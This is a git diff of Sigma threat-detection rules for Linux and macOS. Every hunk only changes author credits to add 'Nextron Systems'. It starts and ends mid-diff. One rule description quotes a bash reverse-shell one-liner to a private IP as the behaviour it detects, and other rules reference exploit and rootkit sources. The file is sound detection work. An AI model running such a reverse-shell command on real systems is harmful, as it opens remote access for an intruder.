b/rules/linux/builtin/lnx_susp_jexboss.yml index a46c3d7cf..eceedcdb6 100644 --- a/rules/linux/builtin/lnx_susp_jexboss.yml +++ b/rules/linux/builtin/lnx_susp_jexboss.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious command sequence that JexBoss references: - https://www.us-cert.gov/ncas/analysis-reports/AR18-312A -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/08/24 modified: 2022/07/07 tags: diff --git a/rules/linux/builtin/lnx_symlink_etc_passwd.yml b/rules/linux/builtin/lnx_symlink_etc_passwd.yml index 81c81d0cc..75393a3b9 100644 --- a/rules/linux/builtin/lnx_symlink_etc_passwd.yml +++ b/rules/linux/builtin/lnx_symlink_etc_passwd.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd references: - https://www.qualys.com/2021/05/04/21nails/21nails.txt -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/04/05 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml b/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml index 2baec98f7..f9c561aaa 100644 --- a/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml +++ b/rules/linux/builtin/sshd/lnx_sshd_ssh_cve_2018_15473.yml @@ -4,7 +4,7 @@ status: test description: Detects exploitation attempt using public exploit code for CVE-2018-15473 references: - https://github.com/Rhynorater/CVE-2018-15473-Exploit -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/08/24 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml b/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml index cf0ef48cc..8584d39b6 100644 --- a/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml +++ b/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml @@ -5,7 +5,7 @@ description: Detects suspicious SSH / SSHD error messages that indicate a fatal references: - https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/06/30 modified: 2021/11/27 tags: diff --git a/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml b/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml index 7bd58fcab..b0c3e6172 100644 --- a/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml +++ b/rules/linux/builtin/sudo/lnx_sudo_cve_2019_14287_user.yml @@ -9,7 +9,7 @@ references: - https://www.openwall.com/lists/oss-security/2019/10/14/1 - https://access.redhat.com/security/cve/cve-2019-14287 - https://twitter.com/matthieugarin/status/1183970598210412546 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/15 modified: 2022/11/26 tags: diff --git a/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml b/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml index 477130076..86afe19fd 100644 --- a/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml +++ b/rules/linux/builtin/syslog/lnx_syslog_susp_named.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts references: - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2018/02/20 modified: 2022/10/05 tags: diff --git a/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml b/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml index 17f88c604..bbdfe379f 100644 --- a/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml +++ b/rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts references: - https://github.com/dagwieers/vsftpd/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/07/05 modified: 2021/11/27 tags: diff --git a/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml b/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml index e5cd4411f..6788ea844 100644 --- a/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml +++ b/rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml @@ -4,7 +4,7 @@ status: experimental description: Detects creation of sudoers file or files in "sudoers.d" directory which can be used a potential method to persiste privileges for a specific user. references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/05 modified: 2022/12/31 tags: diff --git a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml index fe0e24c9c..66311708c 100644 --- a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml +++ b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/05 modified: 2022/12/31 tags: diff --git a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml index 6174611ca..e07e35706 100644 --- a/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml +++ b/rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. Which both are related to the TripleCross persistence method references: - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/05 modified: 2022/12/31 tags: diff --git a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml index fce6d3d17..2610b6ae7 100644 --- a/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml +++ b/rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml @@ -4,7 +4,7 @@ status: test description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') references: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/16 modified: 2022/12/25 logsource: diff --git a/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml b/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml index feb43927a..d10b57430 100644 --- a/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml +++ b/rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml @@ -4,7 +4,7 @@ status: stable description: Detects process connections to a Monero crypto mining pool references: - https://www.poolwatch.io/coin/monero -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/26 logsource: product: linux diff --git a/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml b/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml index 4437abb6a..da2866444 100644 --- a/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml +++ b/rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml @@ -5,7 +5,7 @@ description: Detects an executable accessing an ngrok tunneling endpoint, which references: - https://twitter.com/hakluke/status/1587733971814977537/photo/1 - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/11/03 tags: - attack.exfiltration diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml b/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml index eef908579..15a14c0af 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious process command line that uses base64 encoded input for execution with a shell references: - https://github.com/arget13/DDexec -author: pH-T +author: pH-T (Nextron Systems) date: 2022/07/26 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml index 06fd44c99..fc78b74c2 100644 --- a/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml +++ b/rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml @@ -5,7 +5,7 @@ description: Detects the presence of a base64 version of the shebang in the comm references: - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html - https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml b/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml index f6bab10e0..f3bff8bb7 100644 --- a/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml +++ b/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml @@ -6,7 +6,7 @@ references: - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ - https://bpftrace.org/ - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/25 tags: - attack.execution diff --git a/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml b/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml index 88b121cbf..5e7c45d95 100644 --- a/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml +++ b/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml @@ -6,7 +6,7 @@ references: - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes - https://github.com/carlospolop/PEASS-ng - https://github.com/diego-treitos/linux-smart-enumeration -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/28 tags: - attack.discovery diff --git a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml index 205abdda6..68763fafd 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml @@ -4,7 +4,7 @@ status: test description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights references: - https://github.com/sleventyeleven/linuxprivchecker/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/20 modified: 2022/09/15 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml index 8836eb232..e075425fd 100644 --- a/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml +++ b/rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml @@ -7,7 +7,7 @@ status: experimental description: Detects usage of the 'chattr' utility to remove immutable file attribute. references: - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml index 5e217f0cb..d17ba38aa 100644 --- a/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml +++ b/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml @@ -4,7 +4,7 @@ status: experimental description: Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md -author: Max Altgelt, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC date: 2021/10/15 modified: 2022/09/15 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml index 9fd7bd001..de3ee14b2 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml @@ -6,7 +6,7 @@ description: | This is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible references: - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml index 45c05de3a..12aec6df0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml +++ b/rules/linux/process_creation/proc_creation_lnx_crypto_mining.yml @@ -4,7 +4,7 @@ status: test description: Detects command line parameters or strings often used by crypto miners references: - https://www.poolwatch.io/coin/monero -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/10/26 modified: 2022/12/25 logsource: diff --git a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml index 770a0b51b..3df1ec19f 100644 --- a/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml +++ b/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml @@ -4,7 +4,7 @@ status: experimental description: Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server references: - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.command_and_control diff --git a/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml b/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml index d43cd9c1c..af602ce6c 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml @@ -7,7 +7,7 @@ status: experimental description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134 references: - https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/03 tags: - attack.initial_access diff --git a/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml b/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml index d6ad54f0f..2e9dc2c64 100644 --- a/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml @@ -6,7 +6,7 @@ references: - https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py - https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html - https://github.com/apache/spark/pull/36315/files -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/20 tags: - attack.initial_access diff --git a/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml b/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml index 09341166b..e65fede77 100644 --- a/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml +++ b/rules/linux/process_creation/proc_creation_lnx_gtfobin_apt.yml @@ -5,7 +5,7 @@ description: Detects usage of "apt" and "apt-get" as a GTFOBin to execute and pr references: - https://gtfobins.github.io/gtfobins/apt/ - https://gtfobins.github.io/gtfobins/apt-get/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/28 tags: - attack.discovery diff --git a/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml b/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml index 2438e80eb..35b504161 100644 --- a/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml +++ b/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml @@ -6,7 +6,7 @@ references: - https://gtfobins.github.io/gtfobins/vim/ - https://gtfobins.github.io/gtfobins/rvim/ - https://gtfobins.github.io/gtfobins/vimdiff/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/28 tags: - attack.discovery diff --git a/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml b/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml index 2231e5d33..07fd2d3e1 100644 --- a/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml +++ b/rules/linux/process_creation/proc_creation_lnx_hack_tools.yml @@ -7,7 +7,7 @@ references: - https://github.com/Gui774ume/ebpfkit - https://github.com/pathtofile/bad-bpf - https://github.com/carlospolop/PEASS-ng -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/03 modified: 2023/01/31 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml b/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml index 726225676..0975b798b 100644 --- a/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml +++ b/rules/linux/process_creation/proc_creation_lnx_install_suspicioua_packages.yml @@ -4,7 +4,7 @@ status: experimental description: Detects installation of suspicious packages using system installation utilities references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/03 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml index b780d4369..acd094a4e 100644 --- a/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml +++ b/rules/linux/process_creation/proc_creation_lnx_services_stop_and_disable.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the usage of utilities such as 'systemctl', 'service'...etc to stop or disable tools and services references: - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml b/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml index ab79e370b..2fefd6c1a 100644 --- a/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml @@ -6,7 +6,7 @@ references: - https://www.openwall.com/lists/oss-security/2019/10/14/1 - https://access.redhat.com/security/cve/cve-2019-14287 - https://twitter.com/matthieugarin/status/1183970598210412546 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/15 modified: 2022/10/05 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml index 8bb4c2be8..70a6f5be2 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml @@ -11,7 +11,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file - https://curl.se/docs/manpage.html - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.exfiltration diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml index 901400b74..aa046b851 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml @@ -7,7 +7,7 @@ status: experimental description: Detects a suspicious curl process start on linux with set useragent options references: - https://curl.se/docs/manpage.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/09/15 tags: - attack.command_and_control diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml b/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml index e6c3f50c1..c24d14e00 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_find_execution.yml @@ -7,7 +7,7 @@ status: experimental description: Detects usage of "find" binary in a suspicious manner to perform discovery references: - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/28 tags: - attack.discovery diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml b/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml index 33e0d9972..50f15fe25 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_git_clone.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious references: - https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/03 modified: 2023/01/05 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml index 33398ced8..965de0951 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml @@ -5,7 +5,7 @@ description: Detects events in which a history file gets deleted, e.g. the ~/bas references: - https://github.com/sleventyeleven/linuxprivchecker/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/20 modified: 2022/09/15 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml index ace28ef4d..d6e84f405 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml @@ -5,7 +5,7 @@ description: Detects events in which someone prints the contents of history file references: - https://github.com/sleventyeleven/linuxprivchecker/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/20 modified: 2022/09/15 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml index 35465ae64..f2f0dccec 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_interactive_bash.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious interactive bash as a parent to rather uncommon child processes references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/14 logsource: product: linux diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml b/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml index cad388738..8f781dbf0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml @@ -4,7 +4,7 @@ status: experimental description: Detects java process spawning suspicious children references: - https://www.tecmint.com/different-types-of-linux-shells/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/03 tags: - attack.execution diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml index 0d2659fad..37e6ac007 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml @@ -4,7 +4,7 @@ status: experimental description: Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell references: - Internal Research -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/03/14 modified: 2022/07/26 tags: diff --git a/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml b/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml index 7eeba5399..379b3d484 100644 --- a/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml +++ b/rules/linux/process_creation/proc_creation_lnx_susp_recon_indicators.yml @@ -4,7 +4,7 @@ status: experimental description: Detects events with patterns found in commands used for reconnaissance on linux systems references: - https://github.com/sleventyeleven/linuxprivchecker/blob/0d701080bbf92efd464e97d71a70f97c6f2cd658/linuxprivchecker.py -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/06/20 tags: - attack.reconnaissance diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml index 8c915ef5a..93d7784f0 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml @@ -4,7 +4,7 @@ status: experimental description: Detects execution of a the file "execve_hijack" which is used by the Triple Cross rootkit as a way to elevate privileges references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/05 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml index d3d5d5d36..34e607776 100644 --- a/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml +++ b/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_install.yml @@ -4,7 +4,7 @@ status: experimental description: Detects default install commands of the Triple Cross eBPF rootkit based on the "deployer.sh" script references: - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/05 tags: - attack.defense_evasion diff --git a/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml b/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml index 2b5b8a17a..d4da8acbc 100644 --- a/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml +++ b/rules/linux/process_creation/proc_creation_lnx_webshell_detection.yml @@ -5,7 +5,7 @@ description: Detects suspicious sub processes of web server processes references: - https://www.acunetix.com/blog/articles/web-shells-101-using-php-introduction-web-shells-part-2/ - https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF -author: Florian Roth, Nasreddine Bencherchali (update) +author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) date: 2021/10/15 modified: 2022/12/28 tags: diff --git a/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml b/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml index 577d2f585..6ca0e5c26 100644 --- a/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml +++ b/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml @@ -5,7 +5,7 @@ description: Detects passwords dumps from Keychain references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md - https://gist.github.com/Capybara/6228955 -author: Tim Ismilyaev, oscd.community, Florian Roth +author: Tim Ismilyaev, oscd.community, Florian Roth (Nextron Systems) date: 2020/10/19 modified: 2021/11/27 tags: diff --git 